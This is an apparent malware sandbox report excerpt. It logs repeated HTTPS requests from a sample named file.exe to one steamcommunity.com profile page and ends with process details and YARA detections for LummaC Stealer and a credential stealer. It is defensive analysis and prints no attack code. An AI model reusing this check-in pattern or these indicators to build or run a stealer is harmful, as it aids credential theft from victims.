                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:28 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=8c02966154117fde8952c494; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
2025-03-13 15:40:29 UTC | 14410 | IN |
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-13 15:40:29 UTC | 12098 | IN |
                                                                                                                                                                                                                                      Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49693 | 104.73.234.102 | 443 | 6392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:31 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
2025-03-13 15:40:32 UTC | 1974 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:32 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=dc1700330cc29ea6d894c6bc; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
2025-03-13 15:40:32 UTC | 14410 | IN |
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-13 15:40:32 UTC | 12098 | IN |
                                                                                                                                                                                                                                      Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49694 | 104.73.234.102 | 443 | 6392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:34 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
2025-03-13 15:40:35 UTC | 1974 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:35 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=a56d3429ca48ac76cba2142b; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
2025-03-13 15:40:35 UTC | 14410 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-13 15:40:35 UTC | 12098 | IN | Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49695 | 104.73.234.102 | 443 | 6392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:37 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
2025-03-13 15:40:38 UTC | 1974 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:38 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=f80c8acb02fc14bcdf2afd22; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7Ce71a092c3f52f423f0524b8e40ded237; path=/; secure; HttpOnly; SameSite=None
2025-03-13 15:40:38 UTC | 14410 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-13 15:40:38 UTC | 12098 | IN | Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49696 | 104.73.234.102 | 443 | 6392 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 15:40:40 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com



                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:11:40:07
                                                                                                                                                                                                                                      Start date:13/03/2025
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                      Imagebase:0x220000
                                                                                                                                                                                                                                      File size:2'111'488 bytes
                                                                                                                                                                                                                                      MD5 hash:6F5FD4F79167A7E2C0DB0A9F925118B4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      No disassembly